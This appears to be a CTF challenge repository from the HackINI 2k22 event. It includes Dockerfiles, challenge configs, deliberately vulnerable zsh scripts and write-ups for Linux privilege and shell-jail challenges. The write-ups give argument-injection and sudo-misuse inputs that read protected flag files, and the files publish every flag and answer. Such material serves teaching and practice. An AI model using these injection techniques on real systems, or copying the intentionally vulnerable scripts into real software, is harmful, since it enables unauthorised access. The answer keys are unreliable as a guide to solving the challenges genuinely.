the `id` command, we see that we're logged in as the user `ctf`, which doesn't belong to the `ctf-cracked` group but belongs to the `sudo` group. 7 | Let's see what the `ctf` user can execute using `sudo`: 8 | ![sudo -l result](./images/cap3.png) 9 | We can execute the *diff* command as the `ctf-cracked` user, so we have to find a way to read the *flag.txt* file using this command. 10 | Since the *diff* command shows the differences between the contents of two given files, it is sufficient to compare the *flag.txt* file with any other existing accessible file that has different content. 
11 | 12 | ## Payload 13 | ```bash 14 | sudo -u ctf-cracked diff flag.txt /etc/passwd 15 | ``` 16 | ![diff result](./images/cap4.png) 17 | 18 | ## Flag 19 | 20 | `shellmates{You_ma$tered_th3_t00L}` 21 | 22 | -------------------------------------------------------------------------------- /linux/diff/solution/images/cap1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/diff/solution/images/cap1.png -------------------------------------------------------------------------------- /linux/diff/solution/images/cap2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/diff/solution/images/cap2.png -------------------------------------------------------------------------------- /linux/diff/solution/images/cap3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/diff/solution/images/cap3.png -------------------------------------------------------------------------------- /linux/diff/solution/images/cap4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/diff/solution/images/cap4.png -------------------------------------------------------------------------------- /linux/loca-loca-1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \ 5 | locales locales-all \ 6 | && rm -rf /var/lib/apt/lists/* 7 | 8 | COPY 
requirements.txt /tmp/ 9 | 10 | RUN python -m pip install -r /tmp/requirements.txt && \ 11 | rm /tmp/requirements.txt 12 | 13 | WORKDIR /challenge 14 | 15 | COPY challenge/server.py . 16 | COPY challenge/entrypoint.sh . 17 | COPY challenge/flag.runme . 18 | 19 | RUN chmod +x server.py entrypoint.sh && \ 20 | chmod 111 flag.runme 21 | 22 | EXPOSE 8765 23 | 24 | USER nobody 25 | 26 | ENTRYPOINT ["./entrypoint.sh"] 27 | -------------------------------------------------------------------------------- /linux/loca-loca-1/README.md: -------------------------------------------------------------------------------- 1 | # Loca Loca 1 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > Wanna take a look at my new websocket service? You can upload files and show the date. 8 | > Oh you wanna know how I'm showing the date? I'm simply executing the `date` command using `subprocess`: `subprocess.Popen("date")`. 9 | 10 | **Notes** : 11 | - Make sure to install `websockets` before running the client below: `python3 -m pip install websockets`. 12 | 13 | ## Solution 14 | 15 | Solution of the challenge can be found [here](solution/). 16 | 17 | -------------------------------------------------------------------------------- /linux/loca-loca-1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Loca Loca 1" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: linux 6 | difficulty: medium 7 | 8 | description: | 9 | > Wanna take a look at my new websocket service? You can upload files and show the date. 10 | > Oh you wanna know how I'm showing the date? I'm simply executing the `date` command using `subprocess`: `subprocess.Popen("date")`. 11 | 12 | **Notes** : 13 | - Make sure to install `websockets` before running the client below: `python3 -m pip install websockets`. 
14 | 15 | **Author** : chenx3n 16 | 17 | connection_info: python3 client.py docker.shellmates.club $INSTANCE_PORT 18 | 19 | image: gcr.io/glowing-reserve-336013/loca-loca-1:latest 20 | docker_image: gcr.io/glowing-reserve-336013/loca-loca-1:latest 21 | 22 | value: 500 23 | type: docker 24 | 25 | tags: 26 | - medium 27 | 28 | files: 29 | - ./challenge/client.py 30 | 31 | flags: 32 | - shellmates{Wh3n_wIlL_YOu_l34rn_To_EXeCuT3_biN4R1e$_WitH_TH3iR_4BSOluT3_P4Th} 33 | 34 | state: visible 35 | 36 | version: "0.1" 37 | -------------------------------------------------------------------------------- /linux/loca-loca-1/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | while :; do 4 | ./server.py 5 | echo "Restarting server..." 6 | done 7 | -------------------------------------------------------------------------------- /linux/loca-loca-1/challenge/flag.runme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/loca-loca-1/challenge/flag.runme -------------------------------------------------------------------------------- /linux/loca-loca-1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.3' 2 | 3 | services: 4 | 5 | server: 6 | build: . 
7 | ports: 8 | - '1201:8765' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 100M 16 | -------------------------------------------------------------------------------- /linux/loca-loca-1/requirements.txt: -------------------------------------------------------------------------------- 1 | websockets 2 | werkzeug 3 | jinja2 4 | -------------------------------------------------------------------------------- /linux/loca-loca-1/solution/README.md: -------------------------------------------------------------------------------- 1 | # Loca Loca 1 2 | 3 | ## Write-up (TODO) 4 | 5 | ## Flag 6 | 7 | `shellmates{Wh3n_wIlL_YOu_l34rn_To_EXeCuT3_biN4R1e$_WitH_TH3iR_4BSOluT3_P4Th}` 8 | 9 | -------------------------------------------------------------------------------- /linux/loca-loca-2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \ 5 | locales locales-all \ 6 | && rm -rf /var/lib/apt/lists/* 7 | 8 | COPY requirements.txt /tmp/ 9 | 10 | RUN python -m pip install -r /tmp/requirements.txt && \ 11 | rm /tmp/requirements.txt 12 | 13 | WORKDIR /challenge 14 | 15 | COPY challenge/server.py . 16 | COPY challenge/entrypoint.sh . 17 | COPY challenge/flag.runme . 18 | 19 | RUN chmod +x server.py entrypoint.sh && \ 20 | chmod 111 flag.runme 21 | 22 | EXPOSE 8765 23 | 24 | USER nobody 25 | 26 | ENTRYPOINT ["./entrypoint.sh"] 27 | -------------------------------------------------------------------------------- /linux/loca-loca-2/README.md: -------------------------------------------------------------------------------- 1 | # Loca Loca 2 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > Okay okay, I understand now, I'm not gonna use commands with relative path again. 
8 | > Anyway, that should be fixed now, it's totally secure now, right? 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). 13 | 14 | -------------------------------------------------------------------------------- /linux/loca-loca-2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Loca Loca 2" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: linux 6 | difficulty: hard 7 | 8 | description: | 9 | > Okay okay, I understand now, I'm not gonna use commands with relative path again. 10 | > Anyway, that should be fixed now, it's totally secure now, right? 11 | 12 | **Author** : chenx3n 13 | 14 | connection_info: python3 client.py docker.shellmates.club $INSTANCE_PORT 15 | 16 | image: gcr.io/glowing-reserve-336013/loca-loca-2:latest 17 | docker_image: gcr.io/glowing-reserve-336013/loca-loca-2:latest 18 | 19 | value: 500 20 | type: docker 21 | 22 | tags: 23 | - hard 24 | 25 | files: 26 | - ./challenge/client.py 27 | - ./challenge/server.py 28 | 29 | flags: 30 | - shellmates{$OY_L0ca_cOn_M1_tiGRE_L0C4_L0Ca_l0c4} 31 | 32 | requirements: 33 | - "Loca Loca 1" 34 | 35 | state: visible 36 | 37 | version: "0.1" 38 | -------------------------------------------------------------------------------- /linux/loca-loca-2/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | while :; do 4 | ./server.py 5 | echo "Restarting server..." 
6 | done 7 | -------------------------------------------------------------------------------- /linux/loca-loca-2/challenge/flag.runme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/loca-loca-2/challenge/flag.runme -------------------------------------------------------------------------------- /linux/loca-loca-2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.3' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1202:8765' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 100M 16 | -------------------------------------------------------------------------------- /linux/loca-loca-2/requirements.txt: -------------------------------------------------------------------------------- 1 | websockets 2 | werkzeug 3 | jinja2 4 | -------------------------------------------------------------------------------- /linux/loca-loca-2/solution/README.md: -------------------------------------------------------------------------------- 1 | # Loca Loca 2 2 | 3 | ## Write-up (TODO) 4 | 5 | ## Flag 6 | 7 | `shellmates{$OY_L0ca_cOn_M1_tiGRE_L0C4_L0Ca_l0c4}` 8 | 9 | -------------------------------------------------------------------------------- /linux/nutshell1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | 4 | RUN apt-get update && \ 5 | apt-get install -y socat zsh 6 | 7 | RUN useradd -M -s /bin/zsh nutshell1 8 | 9 | RUN mkdir -p /challenge 10 | 11 | COPY challenge/flag /challenge/ 12 | COPY challenge/nutshell1 /challenge/ 13 | 14 | RUN chown root:root /challenge/flag \ 15 | && chmod 444 /challenge/flag \ 16 | && chown root:root /challenge/nutshell1 \ 17 | && chmod 555 /challenge/nutshell1 18 | 19 | EXPOSE 1337 20 
| 21 | COPY challenge/entrypoint.sh /entrypoint.sh 22 | RUN chmod +x /entrypoint.sh 23 | 24 | WORKDIR /challenge 25 | USER nutshell1 26 | 27 | ENTRYPOINT /entrypoint.sh 28 | -------------------------------------------------------------------------------- /linux/nutshell1/README.md: -------------------------------------------------------------------------------- 1 | # Nutshell 1 2 | 3 | **`Author:`** [badsUwU](https://github.com/abdelmaoo) 4 | 5 | ## Description 6 | 7 | I created my own script, make sure to **read** it well. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /linux/nutshell1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Nutshell 1" 2 | author: "badsUwU" 3 | author_link: "https://github.com/abdelmaoo" 4 | 5 | category: linux 6 | difficulty: medium 7 | 8 | description: | 9 | > I created my own script, make sure to **read** it well. 
10 | 11 | **Author** : badsUwU 12 | 13 | flags: 14 | - shellmates{nUt$H3ll_1_PWnED} 15 | 16 | connection_info: ncat -v --ssl nutshell1.challs.shellmates.club 443 17 | 18 | image: gcr.io/glowing-reserve-336013/nutshell1 19 | 20 | tags: 21 | - medium 22 | - zsh 23 | 24 | files: 25 | - challenge/nutshell1 26 | 27 | value: 500 28 | type: dynamic 29 | extra: 30 | initial: 500 31 | decay: 15 32 | minimum: 50 33 | state: visible 34 | version: "0.1" 35 | -------------------------------------------------------------------------------- /linux/nutshell1/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | exec socat -v tcp-listen:1337,reuseaddr,fork,keepalive, EXEC:"./nutshell1",stderr 4 | -------------------------------------------------------------------------------- /linux/nutshell1/challenge/flag: -------------------------------------------------------------------------------- 1 | shellmates{nUt$H3ll_1_PWnED} -------------------------------------------------------------------------------- /linux/nutshell1/challenge/nutshell1: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | nutshell() { 4 | 5 | echo -n '>> ' 6 | read v1 7 | echo -n '> ' 8 | v2=$(read $v1) 9 | if [[ ! -z $v1 && ! -z $v2 ]]; then 10 | echo noice 11 | $(echo $v2) 12 | exit 13 | fi 14 | echo 'try again ... ' 15 | 16 | } 17 | 18 | echo 'welcome to the ______' 19 | 20 | nutshell 2>/dev/null 21 | 22 | -------------------------------------------------------------------------------- /linux/nutshell1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | server: 4 | build: . 
5 | ports: 6 | - '1337:1337' 7 | deploy: 8 | replicas: 1 9 | restart_policy: 10 | condition: on-failure 11 | resources: 12 | limits: 13 | memory: 50M 14 | healthcheck: 15 | test: socat - TCP4:localhost:1337 || exit 1 16 | interval: 60s 17 | timeout: 2s 18 | retries: 5 -------------------------------------------------------------------------------- /linux/nutshell1/solution/README.md: -------------------------------------------------------------------------------- 1 | # nutshell 1 2 | 3 | ## Write-up 4 | 5 | In line `11`, the content of `v2` gets executed, but in line `8`, `v2` receives the output of the `read` command, and we know that `read` returns nothing. 6 | By reading the `man` page of `read` in `zsh`, we see that the options `-e` and `-E` allow echoing the input and assigning the variable at the same time. 7 | So all you need to do is give `-E` or `-e` to `v1`; then `v2=$(read $v1)` will be interpreted as `v2=$(read -e)`, and giving `cat flag` will print the flag. 8 | 9 | ## Flag 10 | 11 | `shellmates{nUt$H3ll_1_PWnED}` 12 | -------------------------------------------------------------------------------- /linux/nutshell2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | 3 | 4 | RUN apt-get update && \ 5 | apt-get install -y socat zsh 6 | 7 | RUN useradd -M -s /bin/zsh nutshell2 8 | 9 | RUN mkdir -p /challenge 10 | 11 | COPY challenge/flag /challenge/ 12 | COPY challenge/nutshell2 /challenge/ 13 | 14 | RUN chown root:root /challenge/flag \ 15 | && chmod 444 /challenge/flag \ 16 | && chown root:root /challenge/nutshell2 \ 17 | && chmod 555 /challenge/nutshell2 \ 18 | && chmod 557 /challenge 19 | 20 | EXPOSE 1337 21 | 22 | COPY challenge/entrypoint.sh /entrypoint.sh 23 | RUN chmod +x /entrypoint.sh 24 | 25 | WORKDIR /challenge 26 | USER nutshell2 27 | 28 | ENTRYPOINT /entrypoint.sh 29 | -------------------------------------------------------------------------------- /linux/nutshell2/README.md: 
-------------------------------------------------------------------------------- 1 | # Nutshell 2 2 | 3 | **`Author:`** [badsUwU](https://github.com/abdelmaoo) 4 | 5 | ## Description 6 | 7 | Let's try again, can you escape it now?` 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /linux/nutshell2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Nutshell 2" 2 | author: "badsUwU" 3 | author_link: "https://github.com/abdelmaoo" 4 | 5 | category: linux 6 | difficulty: medium 7 | 8 | description: | 9 | > Counting backwards ? 10 | 11 | **Author** : badsUwU 12 | 13 | connection_info: ncat -v docker.shellmates.club $INSTANCE_PORT 14 | 15 | image: gcr.io/glowing-reserve-336013/nutshell2:latest 16 | docker_image: gcr.io/glowing-reserve-336013/nutshell2:latest 17 | 18 | flags: 19 | - shellmates{nUt$H3ll_2_PWnED_vkfdnvjfk} 20 | 21 | tags: 22 | - medium 23 | 24 | files: 25 | - ./challenge/nutshell2 26 | 27 | value: 500 28 | type: docker 29 | 30 | state: visible 31 | version: "0.1" 32 | -------------------------------------------------------------------------------- /linux/nutshell2/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | exec socat -v tcp-listen:1337,reuseaddr,fork,keepalive, EXEC:"./nutshell2",stderr 4 | -------------------------------------------------------------------------------- /linux/nutshell2/challenge/flag: -------------------------------------------------------------------------------- 1 | shellmates{nUt$H3ll_2_PWnED_vkfdnvjfk} -------------------------------------------------------------------------------- /linux/nutshell2/challenge/nutshell2: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | 4 | nutshell() { 5 | 6 | echo -n "> " 7 | read v1 8 | 
touch $(echo $v1) 2>/dev/null 9 | if [[ -f nutshell_file ]];then 10 | read BIRTH MODIFY <<< $( stat nutshell_file --format "%w %y" ) 11 | echo "BIRTH = " $BIRTH 12 | echo "MODIFY = " $MODIFY 13 | read BIRTH MODIFY <<< $( stat nutshell_file --format "%W %Y" ) 14 | if [[ BIRTH -gt MODIFY ]];then 15 | cat flag 16 | fi 17 | fi 18 | rm $(echo $v1) 2>/dev/null 19 | exit 20 | } 21 | 22 | echo 'welcome to Nutshell2.0' 23 | 24 | nutshell 25 | 26 | -------------------------------------------------------------------------------- /linux/nutshell2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | server: 4 | build: . 5 | ports: 6 | - '1337:1337' 7 | deploy: 8 | replicas: 1 9 | restart_policy: 10 | condition: on-failure 11 | resources: 12 | limits: 13 | memory: 50M 14 | healthcheck: 15 | test: socat - TCP4:localhost:1337 || exit 1 16 | interval: 60s 17 | timeout: 2s 18 | retries: 5 -------------------------------------------------------------------------------- /linux/nutshell2/solution/README.md: -------------------------------------------------------------------------------- 1 | # Nutshell2 2 | 3 | ## Write-up 4 | 5 | In this challenge, the script reads `v1`, then creates a file named with the input value, then checks whether the birth date is greater than the last modification date, which seems illogical. 6 | By reading the man page of the `touch` command, we find the option `-t`, which allows us to specify the last modification date. 
7 | In Docker, the `stat` command can't get the birth date, so it gives 0 instead. All you need to do is give a date before the epoch; you can give the following input: `-t 000001010000 nutshell_file` 8 | 9 | ## Flag 10 | 11 | `shellmates{nUt$H3ll_2_PWnED_vkfdnvjfk}` 12 | -------------------------------------------------------------------------------- /linux/nutshell_supreme/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM archlinux:latest 2 | 3 | 4 | RUN pacman -Syy && \ 5 | yes | pacman -Su socat zsh sl 6 | 7 | 8 | RUN useradd -m -d /home/supreme -s /bin/zsh supreme 9 | COPY challenge/flag /home/supreme/flag 10 | COPY challenge/nutshell_supreme /home/supreme/supreme 11 | 12 | RUN find /home/supreme/flag -exec chown root:root {} \; && \ 13 | find /home/supreme/flag -type f -exec chmod 774 {} \; && \ 14 | find /home/supreme/flag -type d -exec chmod 775 {} \; 15 | 16 | 17 | EXPOSE 1337 18 | 19 | COPY challenge/entrypoint.sh /entrypoint.sh 20 | RUN chmod +x /entrypoint.sh 21 | 22 | WORKDIR /home/supreme 23 | USER supreme 24 | ENTRYPOINT /entrypoint.sh 25 | -------------------------------------------------------------------------------- /linux/nutshell_supreme/README.md: -------------------------------------------------------------------------------- 1 | # Nutshell 1 2 | 3 | **`Author:`** [badsUwU](https://github.com/abdelmaoo) 4 | 5 | ## Description 6 | 7 | I created my own shell, cat you escape it? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /linux/nutshell_supreme/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "nutshell supreme" 2 | author: "badsUwU" 3 | author_link: "https://github.com/abdelmaoo" 4 | 5 | category: linux 6 | difficulty: hard 7 | 8 | description: | 9 | > Here is the final version of nutshell, don't even try... 
10 | > I use arch btw. 11 | 12 | **Author** : badsUwU 13 | 14 | flags: 15 | - shellmates{nUt$H3ll_supreme_good_job_12345} 16 | 17 | connection_info: ncat -v --ssl nutshell-supreme.challs.shellmates.club 443 18 | 19 | image: gcr.io/glowing-reserve-336013/nutshell-supreme 20 | 21 | topics: 22 | - zsh 23 | 24 | tags: 25 | - jail 26 | - hard 27 | 28 | files: 29 | - challenge/nutshell_supreme 30 | 31 | value: 500 32 | type: dynamic 33 | extra: 34 | initial: 500 35 | decay: 15 36 | minimum: 50 37 | 38 | state: visible 39 | version: "0.1" 40 | -------------------------------------------------------------------------------- /linux/nutshell_supreme/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | exec socat -v tcp-listen:1337,reuseaddr,fork,keepalive, EXEC:"/home/supreme/supreme",stderr 4 | -------------------------------------------------------------------------------- /linux/nutshell_supreme/challenge/flag: -------------------------------------------------------------------------------- 1 | shellmates{nUt$H3ll_supreme_good_job_12345} -------------------------------------------------------------------------------- /linux/nutshell_supreme/challenge/nutshell_supreme: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | RE="^[a-z0-9A-Z\\]+$" 4 | nutshell() { 5 | echo -n '>' 6 | read v1 7 | 8 | v2=$(read $v1) 9 | 10 | 11 | if [[ ! 
$v2 =~ $RE || -z $v2 ]]; then 12 | echo wrong input 13 | echo "Doesn't match the whitelist" 14 | exit 1 15 | fi 16 | 17 | export TERM='xterm' 18 | echo 'now the train will give you the flag, wait for it' 19 | sleep 1 20 | sl $(echo $v2) -100 -ade && cat flag 21 | } 22 | 23 | nutshell 24 | -------------------------------------------------------------------------------- /linux/nutshell_supreme/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | server: 4 | build: . 5 | ports: 6 | - '1337:1337' 7 | deploy: 8 | replicas: 1 9 | restart_policy: 10 | condition: on-failure 11 | resources: 12 | limits: 13 | memory: 50M 14 | healthcheck: 15 | test: socat - TCP4:localhost:1337 || exit 1 16 | interval: 60s 17 | timeout: 2s 18 | retries: 5 -------------------------------------------------------------------------------- /linux/nutshell_supreme/solution/README.md: -------------------------------------------------------------------------------- 1 | # nutshell supreme 2 | 3 | ## Write-up 4 | 5 | The `sl` command on Arch is not the original one made by [Toyoda Masashi](https://github.com/mtoyoda/sl) but a branch made by [eyJhb](https://github.com/eyJhb/sl). The differences between them are a few options and the exit code: on Arch the exit code is `1`, so even when the train passes, `cat flag` isn't executed. 
The solution is to inject `-v` to get the version, but `-` isn't in the whitelist, so you need to give it as hex. To write to `v2` we proceed the same way as in [nutshell 1](../../nutshell1), and in `v2` we give `\\2dv`. 6 | 7 | ## Flag 8 | 9 | `shellmates{nUt$H3ll_supreme_good_job_12345}` 10 | -------------------------------------------------------------------------------- /linux/remote/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends openssh-server systemd rsyslog 5 | 6 | RUN useradd -s /bin/bash ctf \ 7 | && echo 'ctf:ctf' | chpasswd 8 | 9 | 10 | COPY challenge/flag.txt / 11 | 12 | RUN chmod 444 /flag.txt 13 | RUN rm /usr/bin/scp 14 | 15 | COPY challenge/sshd_config /etc/ssh/sshd_config 16 | COPY challenge/.bashrc /etc/bash.bashrc 17 | 18 | ENTRYPOINT service rsyslog start \ 19 | && service ssh start \ 20 | && tail -f --retry /var/log/auth.log 21 | -------------------------------------------------------------------------------- /linux/remote/README.md: -------------------------------------------------------------------------------- 1 | # remote 2 | 3 | **`Author:`** [Ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > At least give me a second to express my commands. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /linux/remote/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "remote" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | 5 | category: linux 6 | difficulty: easy 7 | 8 | description: | 9 | > At least give me a second to express my commands. 
10 | 11 | **Password** : ctf 12 | 13 | **Author** : Ouxs 14 | 15 | connection_info: ssh ctf@remote -o ProxyCommand="openssl s_client -quiet -connect remote.challs.shellmates.club:443 -servername remote.challs.shellmates.club" 16 | 17 | image: gcr.io/glowing-reserve-336013/remote 18 | 19 | flags: 20 | - shellmates{HOW_DID_U_M4d3_i7_HERE!} 21 | 22 | tags: 23 | - easy 24 | 25 | value: 500 26 | type: dynamic 27 | extra: 28 | initial: 500 29 | decay: 15 30 | minimum: 50 31 | 32 | state: visible 33 | version: "0.1" -------------------------------------------------------------------------------- /linux/remote/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{HOW_DID_U_M4d3_i7_HERE!} 2 | -------------------------------------------------------------------------------- /linux/remote/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 
7 | ports: 8 | - '1337:22' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:22 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /linux/welcome/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends openssh-server systemd rsyslog 5 | 6 | RUN useradd -M -s /bin/bash ctf \ 7 | && echo 'ctf:ctf' | chpasswd 8 | 9 | COPY challenge/sudoers /etc/sudoers 10 | COPY challenge/sshd_config /etc/ssh/sshd_config 11 | COPY challenge/01-custom /etc/update-motd.d/01-custom 12 | 13 | RUN chmod +x /etc/update-motd.d/01-custom && chmod 770 /tmp /var/tmp 14 | 15 | ENTRYPOINT service rsyslog start \ 16 | && service ssh start \ 17 | && tail -f --retry -------------------------------------------------------------------------------- /linux/welcome/README.md: -------------------------------------------------------------------------------- 1 | # Welcome 2 | 3 | **`Author:`** [Ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > This welcome message seems to be interesting... 8 | 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /linux/welcome/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "welcome" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | 5 | category: linux 6 | difficulty: easy 7 | 8 | description: | 9 | > This welcome message seems to be interesting... 
10 | 11 | **flag** : shellmates{what you have found} 12 | **Password** : ctf 13 | 14 | **Author** : Ouxs 15 | 16 | connection_info: ssh ctf@welcome -o ProxyCommand="openssl s_client -quiet -connect welcome.challs.shellmates.club:443 -servername welcome.challs.shellmates.club" 17 | 18 | image: gcr.io/glowing-reserve-336013/welcome 19 | 20 | flags: 21 | - shellmates{f379bbf265604f3514cda4aadbc05137} 22 | 23 | tags: 24 | - easy 25 | 26 | value: 500 27 | type: dynamic 28 | extra: 29 | initial: 500 30 | decay: 15 31 | minimum: 50 32 | 33 | state: visible 34 | version: "0.1" -------------------------------------------------------------------------------- /linux/welcome/challenge/01-custom: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo 3 | echo "=========== Hack.INI 22 ==============" 4 | echo "uptime is $( uptime )" 5 | # f379bbf265604f3514cda4aadbc05137 6 | echo "date is $( date )" 7 | echo "======================================" 8 | -------------------------------------------------------------------------------- /linux/welcome/challenge/sudoers: -------------------------------------------------------------------------------- 1 | # 2 | # This file MUST be edited with the 'visudo' command as root. 3 | # 4 | # Please consider adding local content in /etc/sudoers.d/ instead of 5 | # directly modifying this file. 6 | # 7 | # See the man page for details on how to write a sudoers file. 
8 | # 9 | Defaults env_reset 10 | Defaults mail_badpass 11 | Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" 12 | 13 | # Host alias specification 14 | 15 | # User alias specification 16 | 17 | # Cmnd alias specification 18 | 19 | # User privilege specification 20 | root ALL=(ALL:ALL) ALL 21 | 22 | 23 | # See sudoers(5) for more information on "#include" directives: 24 | 25 | #includedir /etc/sudoers.d 26 | ctf ALL=(ctf-cracked:ctf-cracked) /usr/bin/diff 27 | -------------------------------------------------------------------------------- /linux/welcome/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1337:22' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | -------------------------------------------------------------------------------- /linux/welcome/solution/README.md: -------------------------------------------------------------------------------- 1 | # welcome 2 | 3 | ## Write-up 4 | 5 | After accessing the system, we get this welcome message: 6 | ![welcome message](./images/cap1.png) 7 | We notice that the welcome message is customized. Based on the title of this challenge, *welcome*, a quick search shows that it's possible to write scripts that get executed once a user logs in. These scripts are located in **/etc/update-motd.d/**. If we check this folder, we find a file that looks interesting: `custom`. If we open it, we indeed find the welcome message plus an interesting comment that represents the flag. 8 | ![welcome file content](./images/cap2.png) 9 | Then wrap `f379bbf265604f3514cda4aadbc05137` in `shellmates{}`. 
10 | 11 | ## Payload 12 | ```bash 13 | cat /etc/update-motd.d/01-custom 14 | ``` 15 | 16 | ## Flag 17 | 18 | `shellmates{f379bbf265604f3514cda4aadbc05137}` 19 | 20 | -------------------------------------------------------------------------------- /linux/welcome/solution/images/cap1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/welcome/solution/images/cap1.png -------------------------------------------------------------------------------- /linux/welcome/solution/images/cap2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/welcome/solution/images/cap2.png -------------------------------------------------------------------------------- /misc/Alien/Alien.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Alien/Alien.png -------------------------------------------------------------------------------- /misc/Alien/README.md: -------------------------------------------------------------------------------- 1 | # Alien 2 | 3 | **`Author:`** [Elghazali](https://github.com/Elghazali-99) 4 | 5 | ## Description 6 | 7 | "Located in a strange lunar landscape of great geological interest, this site has one of the most important groupings of prehistoric cave art in the world. More than 15,000 drawings and engravings record the climatic changes, the animal migrations and the evolution of human life on the edge of the Sahara from 6000 BC to the first centuries of the present era. The geological formations are of outstanding scenic interest, with eroded sandstones forming ‘forests of rock’. 
